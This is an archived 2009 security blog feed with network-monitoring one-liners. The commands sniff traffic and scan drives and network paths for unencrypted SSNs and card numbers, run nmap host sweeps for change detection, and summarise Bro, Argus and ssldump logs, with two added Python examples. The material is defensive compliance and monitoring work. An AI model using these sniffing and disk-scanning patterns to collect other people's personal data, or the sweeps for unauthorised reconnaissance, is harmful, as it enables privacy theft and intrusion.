</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-2454136226994283712009-08-22T18:43:00.008-04:002009-08-22T19:11:59.387-04:00NSM: PI detection with grep utils<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;">Here's a simple way to monitor network traffic for compliance with </span><span style="font-size: small;">state & federal privacy regulations</span><span style="font-size: small;">. Monitoring is especially important on perimeter ISP links, where PI can be seen flying naked into the public Internet.. how embarrassing!</span><br />
<br />
<span style="font-size: small;">These ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network. Treat them as candidate matchers, not validators: the SSN area-number ranges reflect SSA allocations before the June 2011 randomization, and a 16-digit pattern cannot match American Express numbers, which have 15 digits. Confirm card hits with a Luhn check before raising an alarm.</span><span style="font-size: small;"><br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Spaced SSNs: </b>ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2]) \d{2} \d{4}(\s|$)'<br />
<b>:: Dashed SSNs: </b>ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])-\d{2}-\d{4}(\s|$)'<br />
<b>:: Dashed CCs (16-digit):</b> </span><span style="font-size: small;">ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'</span><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: small;">:: Non-spaced </span><span style="font-size: small;">CCs (16-digit)</span></b><span style="font-size: small;"><b>: </b>ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})\d{12}(\s|$)'</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
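Added example, not from the original post: the SSN and card patterns above run from Python over a few constructed lines (the pcregrep disk-scan commands further down use the same patterns). It generalises the separators to space or dash, uses digit lookarounds as boundaries, adds the 15-digit American Express form, and passes every card candidate through a Luhn check so the obvious false positives drop out.

```python
"""The post's SSN and card patterns as a Python scanner with a Luhn filter.

Added example, not from the original post: the regexes follow the post's (SSN
area ranges are the pre-2011 ones), generalised to space or dash separators
with digit lookarounds as boundaries, plus the 15-digit American Express form.
The sample text is constructed; none of the numbers are real."""
import re

SSN_RE = re.compile(r"(?<!\d)(?:[0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])[ -]\d{2}[ -]\d{4}(?!\d)")
CARD16_RE = re.compile(r"(?<!\d)(?:6011|5[1-5]\d{2}|4\d{3})(?:[ -]?\d{4}){3}(?!\d)")
CARD15_RE = re.compile(r"(?<!\d)3[47]\d{2}[ -]?\d{6}[ -]?\d{5}(?!\d)")


def luhn_ok(number):
    """ISO/IEC 7812 check digit: double every second digit from the right."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_pi(text):
    """Return (kind, match) pairs: 'ssn', 'card' (Luhn-valid) or 'card-luhn-fail'."""
    hits = [("ssn", m.group(0)) for m in SSN_RE.finditer(text)]
    for rx in (CARD16_RE, CARD15_RE):
        for m in rx.finditer(text):
            kind = "card" if luhn_ok(m.group(0)) else "card-luhn-fail"
            hits.append((kind, m.group(0)))
    return hits


# Constructed sample, e.g. lines from `tcpflow -c` or a file scan.
SAMPLE = """GET /submit?ssn=123-45-6789&card=4111-1111-1111-1111 HTTP/1.1
POST /order card=4111 1111 1111 1112 (typo, fails Luhn)
amex=3782 822463 10005 order_id=8005551212
build 2020-12-3456 timestamp 999-99-9999 (invalid SSN area)"""

if __name__ == "__main__":
    for kind, value in find_pi(SAMPLE):
        print("%-15s %s" % (kind, value))
```

Pipe `tcpflow -c` or `ngrep -q` output into find_pi() rather than alerting on the raw regex: a Luhn failure is almost always a timestamp, an order number or a typo, and the SSN pattern still needs a human look since randomised area numbers are no longer range-bound.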
<span style="font-size: small;">Storing unencrypted PI on disk is also a big no-no. Here's how to detect these:</span><br />
<br />
<span style="font-size: small;"><b>:: Spaced/dashed SSNs: </b></span><span style="font-size: small;">pcregrep -r "(\D?\W)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])( |-)\d{2}( |-)\d{4}\D" [folder/drive/network path to search]</span><br />
<span style="font-size: small;"><b>:: Spaced/dashed CCs:</b> pcregrep -r "(\D?\W)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})( |-)\d{4}( |-)\d{4}( |-)\d{4}\D" [folder/drive/network path to search]</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-30690902206443208662009-08-22T17:49:00.003-04:002009-08-22T17:54:09.827-04:00NSM: Simple network change detection with nmap<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;">I run this daily to see network adds/changes. </span><span style="font-size: small;">MAC address changes are also detected, which is useful for spotting ARP cache poisoning and changes to system hardware. (nmap only reports MAC addresses when it runs as root on the same layer-2 segment as the targets.) </span><br />
<span style="font-size: small;"><br />
<span style="font-size: small;"><b>1. Create a baseline list of network hosts: </b><br />
nmap -R -sP --system-dns "192.168.1.*" -oN temp.txt<br />
grep -v "#" temp.txt | grep -v "appears to be down" > baseline_hosts.txt<br />
rm temp.txt<br />
<br />
<b> 2. Then, save an updated list of hosts, and compare this against the baseline list:</b><br />
nmap -R -sP --system-dns "192.168.1.*" -oN temp.txt<br />
grep -v "#" temp.txt | grep -v "appears to be down" > current_hosts.txt<br />
rm temp.txt<br />
grep -v -x -F -f baseline_hosts.txt current_hosts.txt<br />
<br />
The last grep prints every line of the current list that is absent from the baseline (new hosts, new MAC addresses, changed hostnames); swap the two file names to see what disappeared. The "#" has to be quoted, otherwise the shell reads the rest of the line as a comment and grep runs without a pattern. Newer nmap releases spell -sP as -sn and print "Host is up (0.0012s latency)." with a per-run latency figure, so filter those lines out as well before comparing.</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
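The same comparison done per host instead of per line, as an added example that is not part of the original post: it parses two `nmap -sn -oN` reports, ignores the latency figure, and names what changed (new host, vanished host, MAC or hostname change), which is the ARP-poisoning signal the post is after. The two reports are constructed in the newer "Nmap scan report for" output format.

```python
"""Diff two `nmap -sn -oN` reports by host rather than by line.  Added
example, not from the original post; both reports are constructed."""
import re

REPORT_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")
MAC_RE = re.compile(r"^MAC Address: (?P<mac>[0-9A-F:]{17})(?: \((?P<vendor>.*)\))?$")


def parse_report(text):
    """Return {ip: {"name": hostname or None, "mac": mac or None}} for hosts that are up."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = REPORT_RE.match(line)
        if m:
            # "for host (ip)" when reverse DNS resolved, "for ip" otherwise
            ip = m.group("ip") or m.group("name")
            name = m.group("name") if m.group("ip") else None
            current = hosts.setdefault(ip, {"name": name, "mac": None})
            continue
        m = MAC_RE.match(line)
        if m and current is not None:
            current["mac"] = m.group("mac")
    return hosts


def diff_reports(baseline, current):
    """List (change, ip, detail) tuples; latency lines never influence the result."""
    old, new = parse_report(baseline), parse_report(current)
    changes = []
    for ip in sorted(set(old) | set(new)):
        if ip not in old:
            changes.append(("new", ip, new[ip]["mac"]))
        elif ip not in new:
            changes.append(("gone", ip, old[ip]["mac"]))
        elif old[ip]["mac"] != new[ip]["mac"]:
            changes.append(("mac-changed", ip, "%s -> %s" % (old[ip]["mac"], new[ip]["mac"])))
        elif old[ip]["name"] != new[ip]["name"]:
            changes.append(("name-changed", ip, "%s -> %s" % (old[ip]["name"], new[ip]["name"])))
    return changes


# Constructed reports: the gateway's MAC changes, the printer vanishes, a new host appears.
BASELINE = """# Nmap 7.80 scan initiated Mon Aug 24 06:00:01 2020 as: nmap -sn -oN temp.txt 192.168.1.0/24
Nmap scan report for gateway.lan (192.168.1.1)
Host is up (0.0011s latency).
MAC Address: 00:11:22:33:44:55 (Cisco Systems)
Nmap scan report for 192.168.1.20
Host is up (0.0043s latency).
MAC Address: AA:BB:CC:DD:EE:01 (Dell)
Nmap scan report for printer.lan (192.168.1.30)
Host is up (0.0098s latency).
MAC Address: AA:BB:CC:DD:EE:02 (Hewlett Packard)
# Nmap done at Mon Aug 24 06:00:09 2020 -- 256 IP addresses (3 hosts up) scanned in 8.12 seconds
"""

CURRENT = """# Nmap 7.80 scan initiated Tue Aug 25 06:00:01 2020 as: nmap -sn -oN temp.txt 192.168.1.0/24
Nmap scan report for gateway.lan (192.168.1.1)
Host is up (0.0015s latency).
MAC Address: DE:AD:BE:EF:00:01 (Unknown)
Nmap scan report for 192.168.1.20
Host is up (0.0040s latency).
MAC Address: AA:BB:CC:DD:EE:01 (Dell)
Nmap scan report for 192.168.1.77
Host is up (0.0030s latency).
MAC Address: AA:BB:CC:DD:EE:09 (Apple)
# Nmap done at Tue Aug 25 06:00:10 2020 -- 256 IP addresses (3 hosts up) scanned in 8.33 seconds
"""

if __name__ == "__main__":
    for change, ip, detail in diff_reports(BASELINE, CURRENT):
        print("%-13s %-15s %s" % (change, ip, detail))
```

A gateway whose MAC changes overnight while its hostname stays the same is exactly what ARP cache poisoning (or a swapped router) looks like from a daily sweep; the line-based grep shows the same event only as one unexplained extra line.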
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-76028086475913311932009-08-22T17:09:00.001-04:002009-08-22T17:54:38.221-04:00NSM: Web/email traffic analysis with Bro-IDS<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 email senders: </b>grep "FROM: " [Bro_mime.log] | egrep -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 email recipients: </b>grep "TO: " [Bro_mime.log] | egrep -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}" | sort | uniq -c | sort -nr | head -n 10<b> <br />
</b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web browser/client apps: </b>cat [Bro_http.log] | grep -i user-agent | cut -f6- -d' ' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web servers (based on HTTP objects): </b>cat [Bro_http.log] | grep "HOST: " | awk '{ print$5 }' | sort | uniq -c | sort -nr | head -n 10 <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 DNS A-record queries: </b>cat [Bro_dns.log] | grep "query ?A" | awk '{ print$6 }' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 HTTP server response codes: </b>cat [Bro_http.log] | pcregrep -o '\(\d{3} "' | cut -c 2-5 | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: HTTP POST/GET counts: </b>cat [Bro_http.log] | pcregrep -o "POST|GET" | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span><span style="font-size: small;"><b><br />
</b></span><span style="font-size: small;"><b></b></span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-38466411949473610902009-08-22T16:30:00.001-04:002009-08-22T18:01:06.659-04:00NSM: Top 10s with Argus!<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 80 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 FTP servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 21 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10<b> <br />
</b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 SMTP servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 25 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 SMTP clients: </b>ra -nn -r [argus_file] -s saddr - tcp and dst port 25 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 protocols: </b>ra -n -r [argus_file] -s proto | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 TCP ports: </b>ra -nn -r [argus_file] -s dport - tcp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 UDP ports: </b></span><span style="font-size: small;">ra -nn -r [argus_file] -s dport - udp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10 </span><span style="font-size: small;"> <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 source (client) IPs: </b>ra -nn -r [argus_file] -s saddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 destination (server) IPs: </b>ra -nn -r [argus_file] </span><span style="font-size: small;">-s daddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 host-pairs: </b>ra -nn -r [argus_file] -s proto saddr dir daddr | grep -v man | awk '{print$2$3$4}' | sort | uniq -c | sort -nr | head -n 10</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-37194069839274838502009-08-22T15:12:00.002-04:002009-08-22T18:02:50.455-04:00NSM: SSL handshake analysis with ssldump<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total SSL Handshakes:</b> ssldump -n -r <i>[capture_file]</i> | grep Handshake | wc -l</span><span style="font-size: small;"> <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total ClientHellos:</b> ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep ClientHello | wc -l</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: List SSL versions negotiated: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep Version | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: List CipherSuites negotiated: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep "cipherSuite" | sort | uniq -c | sort -nr</span><br />
<span style="font-size: small;"><b>:: List ServerHello events: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep "ServerHello" | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total ChangeCipherSpec events:</b> ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep ChangeCipherSpec | wc -l</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-75685949246289602752008-07-29T17:43:00.000-04:002009-08-22T14:56:45.011-04:00Hardware Hacking: Ghetto wifi bridge<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBYQdiW6Kx7hS3zNFJmPXmr646FEwKAywYBNld9bdEtj31GhOVuvYCy_OsD2cR8aeNyHobATADKfXqNVRvze_Mcpj7F3nK3BjxF1WOv6LFFxi8qjKJaYFROr5zTkcdcR1hQ0QpA5ftPA/s1600-h/gw2.JPG"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5228555369858638834" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBYQdiW6Kx7hS3zNFJmPXmr646FEwKAywYBNld9bdEtj31GhOVuvYCy_OsD2cR8aeNyHobATADKfXqNVRvze_Mcpj7F3nK3BjxF1WOv6LFFxi8qjKJaYFROr5zTkcdcR1hQ0QpA5ftPA/s400/gw2.JPG" style="float: left; margin: 0px 10px 10px 0px;" /></a><br />
<span style="font-family: trebuchet ms; font-size: 85%;">. 14 dBi sector panel antenna with </span><span style="font-family: trebuchet ms; font-size: 85%;">500 mW amp<br />
. Standard Bombay Sapphire panel mount</span><br />
<span style="font-family: trebuchet ms; font-size: 85%;">. Gaping PC with red LED fans</span><span style="font-family: trebuchet ms; font-size: 85%;"> <br />
</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1